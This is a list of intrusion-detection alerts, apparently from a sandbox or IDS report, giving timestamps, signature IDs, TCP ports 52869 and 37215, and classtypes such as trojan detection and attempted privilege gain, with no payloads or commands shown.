                      Timestamp:07/20/24-23:06:14.487901
                      SID:2025132
                      Source Port:58160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.125189
                      SID:2027339
                      Source Port:57154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.286733
                      SID:2027339
                      Source Port:47518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.540716
                      SID:2027339
                      Source Port:48374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.787018
                      SID:2831300
                      Source Port:50792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.338809
                      SID:2025132
                      Source Port:32858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.357595
                      SID:2027339
                      Source Port:37156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2829579
                      Source Port:44990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2829579
                      Source Port:34086
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.076249
                      SID:2025132
                      Source Port:59556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.454601
                      SID:2831300
                      Source Port:35194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.217467
                      SID:2027339
                      Source Port:49408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.237128
                      SID:2027339
                      Source Port:56086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993065
                      SID:2025132
                      Source Port:55808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2835222
                      Source Port:42306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2835222
                      Source Port:37502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.442841
                      SID:2027339
                      Source Port:37412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.849532
                      SID:2831300
                      Source Port:36694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.479448
                      SID:2027339
                      Source Port:47416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.206536
                      SID:2027339
                      Source Port:57066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.333908
                      SID:2027339
                      Source Port:53114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440705
                      SID:2027339
                      Source Port:48322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.357380
                      SID:2027339
                      Source Port:42522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.209942
                      SID:2831300
                      Source Port:54582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.188277
                      SID:2835222
                      Source Port:39194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.319028
                      SID:2831300
                      Source Port:36088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.180793
                      SID:2025132
                      Source Port:33004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.267339
                      SID:2027339
                      Source Port:34032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.240850
                      SID:2027339
                      Source Port:56874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.355569
                      SID:2831300
                      Source Port:40430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.526128
                      SID:2831300
                      Source Port:40328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.253105
                      SID:2025132
                      Source Port:37830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2829579
                      Source Port:44136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.484078
                      SID:2027339
                      Source Port:36022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.472951
                      SID:2027339
                      Source Port:44760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.934740
                      SID:2025132
                      Source Port:52208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2829579
                      Source Port:38480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.816478
                      SID:2025132
                      Source Port:54330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:31.562284
                      SID:2025132
                      Source Port:42296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2835222
                      Source Port:54386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2829579
                      Source Port:41340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.165987
                      SID:2025132
                      Source Port:39686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.066624
                      SID:2025132
                      Source Port:44746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.426944
                      SID:2025132
                      Source Port:59132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.591570
                      SID:2025132
                      Source Port:34526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.911338
                      SID:2027339
                      Source Port:52834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.526204
                      SID:2025132
                      Source Port:56102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2829579
                      Source Port:33960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.650758
                      SID:2831300
                      Source Port:51018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.154497
                      SID:2027339
                      Source Port:50594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.571972
                      SID:2027339
                      Source Port:54350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2835222
                      Source Port:40386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2829579
                      Source Port:58998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.443569
                      SID:2831300
                      Source Port:34280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2829579
                      Source Port:34350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.496382
                      SID:2831300
                      Source Port:34594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.918953
                      SID:2027339
                      Source Port:49368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2829579
                      Source Port:35100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.399812
                      SID:2831300
                      Source Port:50938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2835222
                      Source Port:58514
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.980733
                      SID:2027339
                      Source Port:37830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.154110
                      SID:2027339
                      Source Port:59262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.068811
                      SID:2025132
                      Source Port:44140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.005036
                      SID:2027339
                      Source Port:58300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.161619
                      SID:2831300
                      Source Port:50328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2829579
                      Source Port:55780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2027339
                      Source Port:39126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.709518
                      SID:2027339
                      Source Port:49142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.793781
                      SID:2027339
                      Source Port:46762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.531553
                      SID:2835222
                      Source Port:50780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2829579
                      Source Port:42704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.584377
                      SID:2027339
                      Source Port:50454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.262014
                      SID:2831300
                      Source Port:45254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.365995
                      SID:2025132
                      Source Port:49596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.451363
                      SID:2831300
                      Source Port:45140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.880694
                      SID:2025132
                      Source Port:40576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:56.433850
                      SID:2025132
                      Source Port:58772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.839686
                      SID:2027339
                      Source Port:46136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.389614
                      SID:2025132
                      Source Port:50182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.468942
                      SID:2027339
                      Source Port:49062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763323
                      SID:2829579
                      Source Port:33908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.445659
                      SID:2831300
                      Source Port:32996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2829579
                      Source Port:60438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2835222
                      Source Port:53434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.090071
                      SID:2831300
                      Source Port:36554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.357307
                      SID:2831300
                      Source Port:40712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2835222
                      Source Port:39246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2835222
                      Source Port:40066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.429987
                      SID:2835222
                      Source Port:56148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.085193
                      SID:2835222
                      Source Port:60072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.716020
                      SID:2831300
                      Source Port:40184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.633200
                      SID:2025132
                      Source Port:58120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.499861
                      SID:2027339
                      Source Port:54046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.555463
                      SID:2025132
                      Source Port:57776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2835222
                      Source Port:40526
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2835222
                      Source Port:50838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2027339
                      Source Port:43198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.714236
                      SID:2025132
                      Source Port:43432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.662629
                      SID:2027339
                      Source Port:37124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.660757
                      SID:2025132
                      Source Port:48122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.422168
                      SID:2831300
                      Source Port:37268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.387430
                      SID:2835222
                      Source Port:33238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.781031
                      SID:2027339
                      Source Port:59852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.139331
                      SID:2027339
                      Source Port:50814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.911827
                      SID:2025132
                      Source Port:55208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.462908
                      SID:2831300
                      Source Port:48582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.678943
                      SID:2025132
                      Source Port:59672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2835222
                      Source Port:35856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2829579
                      Source Port:44754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440253
                      SID:2831300
                      Source Port:51908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2835222
                      Source Port:41882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.939156
                      SID:2027339
                      Source Port:55262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2829579
                      Source Port:59972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.157384
                      SID:2025132
                      Source Port:50876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.949518
                      SID:2025132
                      Source Port:39564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.557710
                      SID:2025132
                      Source Port:56342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.346541
                      SID:2025132
                      Source Port:45586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2835222
                      Source Port:44400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.282313
                      SID:2025132
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:42.331305
                      SID:2027339
                      Source Port:49188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.756595
                      SID:2835222
                      Source Port:43482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.271822
                      SID:2829579
                      Source Port:33290
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.180793
                      SID:2831300
                      Source Port:46750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2829579
                      Source Port:43704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2835222
                      Source Port:32858
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2835222
                      Source Port:36342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.398358
                      SID:2025132
                      Source Port:36878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.429308
                      SID:2027339
                      Source Port:36998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.134392
                      SID:2027339
                      Source Port:49670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.497165
                      SID:2027339
                      Source Port:49936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.436745
                      SID:2027339
                      Source Port:41226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.560327
                      SID:2027339
                      Source Port:40116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.531607
                      SID:2027339
                      Source Port:60610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.206449
                      SID:2831300
                      Source Port:39128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2829579
                      Source Port:43408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.166047
                      SID:2027339
                      Source Port:36218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.312688
                      SID:2025132
                      Source Port:56742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.440618
                      SID:2027339
                      Source Port:54514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468948
                      SID:2027339
                      Source Port:59298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2829579
                      Source Port:47918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.416273
                      SID:2831300
                      Source Port:39654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2835222
                      Source Port:59166
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.525575
                      SID:2027339
                      Source Port:55816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.424851
                      SID:2835222
                      Source Port:52962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.432602
                      SID:2025132
                      Source Port:44022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.270058
                      SID:2025132
                      Source Port:40668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.827023
                      SID:2829579
                      Source Port:42340
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.248451
                      SID:2027339
                      Source Port:57812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.978394
                      SID:2027339
                      Source Port:40892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.100644
                      SID:2831300
                      Source Port:48250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.105390
                      SID:2027339
                      Source Port:58606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:43.717699
                      SID:2025132
                      Source Port:49578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:32.540943
                      SID:2025132
                      Source Port:56130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.153687
                      SID:2025132
                      Source Port:57402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.926399
                      SID:2025132
                      Source Port:55850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.179441
                      SID:2831300
                      Source Port:43110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.442724
                      SID:2025132
                      Source Port:57634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.188540
                      SID:2025132
                      Source Port:33034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.748553
                      SID:2835222
                      Source Port:48406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.450049
                      SID:2831300
                      Source Port:58316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.881994
                      SID:2027339
                      Source Port:37062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.747874
                      SID:2027339
                      Source Port:49584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.355766
                      SID:2831300
                      Source Port:38406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.385840
                      SID:2831300
                      Source Port:58658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.335286
                      SID:2025132
                      Source Port:50208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.133891
                      SID:2831300
                      Source Port:35378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.461325
                      SID:2027339
                      Source Port:41248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.337396
                      SID:2831300
                      Source Port:46198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.471777
                      SID:2831300
                      Source Port:48216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.122085
                      SID:2831300
                      Source Port:53158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:19.865859
                      SID:2025132
                      Source Port:49366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.352208
                      SID:2027339
                      Source Port:50600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.046185
                      SID:2025132
                      Source Port:35244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2835222
                      Source Port:50136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.471230
                      SID:2027339
                      Source Port:50508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.392409
                      SID:2027339
                      Source Port:59254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.983769
                      SID:2027339
                      Source Port:60934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.786611
                      SID:2027339
                      Source Port:53968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326086
                      SID:2027339
                      Source Port:43122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.369944
                      SID:2831300
                      Source Port:50328
                      Destination Port:52869
                      Protocol:TCP
